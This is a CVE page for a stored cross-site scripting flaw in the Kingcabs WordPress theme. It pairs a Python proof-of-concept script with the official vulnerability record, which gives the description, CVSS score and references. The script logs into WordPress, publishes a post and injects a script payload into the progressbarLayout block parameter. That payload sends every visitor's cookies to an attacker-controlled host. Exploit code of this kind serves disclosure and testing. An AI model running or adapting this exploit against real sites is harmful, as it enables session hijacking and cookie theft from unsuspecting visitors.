CVE-2025-7058

import requests from bs4 import BeautifulSoup # CVE-2025-7058 PoC - Stored XSS in Kingcabs theme progressbarLayout parameter # Target: WordPress site with Kingcabs theme <= 1.1.9 TARGET_URL = "http://target-wordpress-site.com" USERNAME = "attacker_username" PASSWORD = "attacker_password" def exploit_stored_xss(): """ This PoC demonstrates the stored XSS vulnerability in Kingcabs theme. Attacker needs Contributor-level access or higher. """ session = requests.Session() # Step 1: Login to WordPress with Contributor+ account login_url = f"{TARGET_URL}/wp-login.php" login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': f"{TARGET_URL}/wp-admin/" } session.post(login_url, data=login_data) # Step 2: Create or edit a post/page post_url = f"{TARGET_URL}/wp-admin/post-new.php" # Step 3: Inject XSS payload via progressbarLayout parameter # The malicious script will be stored and executed for all visitors xss_payload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>' post_data = { 'post_title': 'XSS Test', 'content': f'<!-- wp:kingcabs/progressbar {{"progressbarLayout":"{xss_payload}"}} /-->', 'post_status': 'publish' } response = session.post(post_url, data=post_data) print(f"XSS payload injected. Post ID: {response.url}") print(f"Payload: {xss_payload}") print("Any user visiting this page will execute the injected JavaScript.") if __name__ == "__main__": exploit_stored_xss()

{"cve": {"id": "CVE-2025-7058", "sourceIdentifier": "[email protected]", "published": "2025-12-13T16:16:55.290", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Kingcabs theme for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘progressbarLayout’ parameter in all versions up to, and including, 1.1.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://themes.trac.wordpress.org/browser/kingcabs/1.1.9/blocks-extends/blocks/progressbar.php#L44", "source": "[email protected]"}, {"url": "https://themes.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=290354%40kingcabs&new=290354%40kingcabs&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7d75851d-4dd5-4fb4-97bc-fc63575e483e?source=cve", "source": "[email protected]"}]}}